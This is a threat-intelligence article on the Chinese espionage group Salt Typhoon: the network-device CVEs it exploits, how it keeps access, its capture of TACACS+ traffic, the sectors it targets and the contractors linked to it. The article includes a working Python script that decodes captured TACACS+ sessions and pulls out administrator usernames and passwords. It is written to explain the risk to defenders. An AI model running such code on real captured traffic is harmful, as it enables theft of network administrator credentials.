Salt Typhoon is a highly sophisticated advanced persistent threat (APT) actor associated with the government of China. Since at least 2019 it has conducted one of the most aggressive global espionage campaigns on record, one that undermines privacy and security norms across the telecommunications industry. The campaign reaches beyond telecom into government, transportation, hospitality, and military networks. According to reports, Salt Typhoon has compromised more than 600 organizations worldwide, almost 200 of them in the U.S.
The actor repeatedly exploits critical flaws in network perimeter devices to gain initial access to target environments, abusing vulnerabilities in widely deployed products from vendors including Cisco, Ivanti, and Palo Alto Networks, and then exfiltrating sensitive data. The impact of these breaches extends well beyond the compromised organization: the stolen data lets the Chinese Communist Party track communications, and even individuals' physical movements, across the globe.
Exploitation of Network Devices
Salt Typhoon's modus operandi centers on exploiting publicly known vulnerabilities in network devices, flaws for which patches were already available, rather than zero-days. The actor has exploited dozens of Common Vulnerabilities and Exposures (CVEs) to gain access. Cisco devices were attacked through CVE-2018-0171 (Smart Install) and the CVE-2023-20198 / CVE-2023-20273 IOS XE web UI chain; Ivanti Connect Secure appliances through CVE-2023-46805 and CVE-2024-21887; and Palo Alto Networks PAN-OS devices through CVE-2024-3400.
Once on a device, Salt Typhoon changes its configuration to entrench itself. On Cisco IOS XR devices the actors have enabled the sshd_operns service, which gives SSH access to the device's underlying Linux shell, and then added local users with sudo access. That gives them a way back in that survives patching of the original vulnerability. A recent cybersecurity advisory cited these actors focusing specifically on the backbone routers of large telecommunications providers, and using compromised devices and trusted inter-provider connections to pivot into other networks.
The adversaries have also been observed collecting packet captures (PCAPs) with native tooling on compromised devices, with the primary goal of intercepting TACACS+ traffic, which runs over TCP port 49. TACACS+ carries device administrator authentication and authorization exchanges, and its packet body is only obfuscated with an MD5-derived keystream seeded by a shared secret, so an actor holding both the captures and that secret (or a site that runs TACACS+ with the unencrypted flag set) can recover administrator usernames and passwords and learn which accounts are allowed to manage which devices.
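To show why a PCAP of TCP/49 traffic is so valuable, the following added example (written for this page, not code from the advisory or from any vendor) builds a two-packet TACACS+ ASCII login the way a router would send it, then recovers the username and password from the captured bytes the same way an attacker would. The capture, session ID, shared key `tacacs123` and the credentials are all constructed for the demo; the pseudo-pad and header layout follow RFC 8907 section 4.5.

```python
"""TACACS+ body obfuscation and credential recovery from a captured session (constructed demo)."""
import hashlib
import struct

TAC_PLUS_VERSION = 0xC0            # major version 0xC, minor version 0
TAC_PLUS_AUTHEN = 0x01             # packet type: authentication
TAC_PLUS_UNENCRYPTED_FLAG = 0x01   # header flag: body is sent in the clear
HEADER = struct.Struct("!BBBBII")  # version, type, seq_no, flags, session_id, length


def pseudo_pad(session_id, key, version, seq_no, length):
    """RFC 8907 keystream: MD5_1 = MD5(session_id|key|version|seq_no), MD5_n adds MD5_{n-1}.
    This is obfuscation keyed only by the shared secret, not authenticated encryption."""
    seed = struct.pack("!I", session_id) + key + bytes([version, seq_no])
    pad, prev = b"", b""
    while len(pad) < length:
        prev = hashlib.md5(seed + prev).digest()
        pad += prev
    return pad[:length]


def crypt_body(body, session_id, key, version, seq_no):
    """XOR the body with the pseudo-pad; symmetric, so it both obfuscates and recovers."""
    pad = pseudo_pad(session_id, key, version, seq_no, len(body))
    return bytes(b ^ p for b, p in zip(body, pad))


def build_packet(session_id, seq_no, body, key=None):
    """Wrap a body in a TACACS+ header; with no key the unencrypted flag is set instead."""
    flags = 0 if key else TAC_PLUS_UNENCRYPTED_FLAG
    if key:
        body = crypt_body(body, session_id, key, TAC_PLUS_VERSION, seq_no)
    return HEADER.pack(TAC_PLUS_VERSION, TAC_PLUS_AUTHEN, seq_no, flags, session_id, len(body)) + body


def authen_start_body(user, port=b"tty0", rem_addr=b"10.0.0.5"):
    """Authentication START: action=LOGIN(1), priv_lvl=15, authen_type=ASCII(1), service=LOGIN(1)."""
    return struct.pack("!BBBBBBBB", 1, 15, 1, 1, len(user), len(port), len(rem_addr), 0) + user + port + rem_addr


def authen_continue_body(user_msg):
    """Authentication CONTINUE: user_msg_len(2), data_len(2), flags(1), user_msg (the password)."""
    return struct.pack("!HHB", len(user_msg), 0, 0) + user_msg


def parse_packet(pkt, key=None):
    """Split header and body; de-obfuscate the body when the unencrypted flag is not set."""
    version, ptype, seq_no, flags, session_id, length = HEADER.unpack(pkt[:HEADER.size])
    body = pkt[HEADER.size:HEADER.size + length]
    unencrypted = bool(flags & TAC_PLUS_UNENCRYPTED_FLAG)
    if not unencrypted:
        if key is None:
            raise ValueError("body is obfuscated and no shared key was supplied")
        body = crypt_body(body, session_id, key, version, seq_no)
    return {"type": ptype, "seq_no": seq_no, "session_id": session_id, "unencrypted": unencrypted, "body": body}


def recover_credentials(packets, key=None):
    """Walk the client-to-server authentication packets of one session (odd seq_no) and
    pull the username from START and the password from the following CONTINUE."""
    user = password = None
    for pkt in packets:
        p = parse_packet(pkt, key)
        if p["type"] != TAC_PLUS_AUTHEN or p["seq_no"] % 2 == 0:
            continue  # server replies carry even seq_no and no credentials
        body = p["body"]
        if p["seq_no"] == 1:                      # START: user_len is byte 4, user begins at byte 8
            user = body[8:8 + body[4]].decode(errors="replace")
        else:                                     # CONTINUE: user_msg is the reply to GETPASS
            msg_len = struct.unpack("!H", body[:2])[0]
            password = body[5:5 + msg_len].decode(errors="replace")
    return user, password


# Constructed sample capture: one admin login as a router would send it, client side only.
SHARED_KEY = b"tacacs123"          # constructed weak shared secret
SESSION = 0x1A2B3C4D
SAMPLE_CAPTURE = [
    build_packet(SESSION, 1, authen_start_body(b"netadmin"), SHARED_KEY),
    build_packet(SESSION, 3, authen_continue_body(b"Hunter2!"), SHARED_KEY),
]
PLAINTEXT_CAPTURE = [             # same login from a device configured without a key
    build_packet(SESSION, 1, authen_start_body(b"netadmin")),
    build_packet(SESSION, 3, authen_continue_body(b"Hunter2!")),
]

if __name__ == "__main__":
    print("obfuscated session, key known:", recover_credentials(SAMPLE_CAPTURE, SHARED_KEY))
    print("unencrypted session, no key:  ", recover_credentials(PLAINTEXT_CAPTURE))
```

The takeaway for defenders is that the confidentiality of every administrator login in the capture rests on one static shared secret, which is often identical across a fleet and recoverable from device configuration backups; rotating it after a suspected compromise, and alerting on unexpected packet-capture activity on routers, are the practical mitigations.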
Global Impact and Targeted Sectors
Salt Typhoon's operations reach at least 80 countries, deeply embedding it in global telecommunications infrastructure. Its targeting has expanded beyond telecommunications operators to sectors such as hospitality and transportation, because booking and travel records from those industries, combined with call and subscriber data from telecoms, let the actor build a detailed picture of a targeted individual's communications and movements.
John Hultquist, Chief Analyst at Google Threat Intelligence Group, noted the significance of this targeting: “In addition to targeting telecommunications, reported targeting of hospitality and transportation by this actor could be used to closely surveil individuals. Information from these sectors can be used to develop a full picture of who someone is talking to, where they are, and where they are going.”
Salt Typhoon's ability to defeat security best practices is an alarming warning flag for national security and a serious risk to global communications privacy. Brett Leatherman, head of the U.S. Federal Bureau of Investigation's Cyber Division, emphasized the gravity of the situation: “Salt Typhoon's activities are breaching global telecommunications privacy and security norms.”
Connections to Chinese Entities
Investigations into Salt Typhoon's activities have linked it to three Chinese companies: Sichuan Juxinhe Network Technology Co., Ltd., Beijing Huanyu Tianqiong Information Technology Co., Ltd., and Sichuan Zhixin Ruijie Network Technology Co., Ltd. These links illustrate a wider ecosystem of contractors and academics that facilitates Chinese cyber espionage.
Hultquist elaborated on this ecosystem: “An ecosystem of contractors, academics, and other facilitators is at the heart of Chinese cyber espionage. Contractors are used to build tools and valuable exploits as well as carry out the dirty work of intrusion operations. They have been instrumental in the rapid evolution of these operations and growing them to an unprecedented scale.”
Coordination among these entities contributes significantly to the effectiveness of APT groups like Salt Typhoon. Salt Typhoon activity also overlaps with clusters that other vendors track as GhostEmperor, Operator Panda, RedMike, and UNC5807. The overlap is notable because it reflects a broader operating model shared by Chinese state-sponsored actors, in which contractors supply tooling and carry out intrusions on the state's behalf.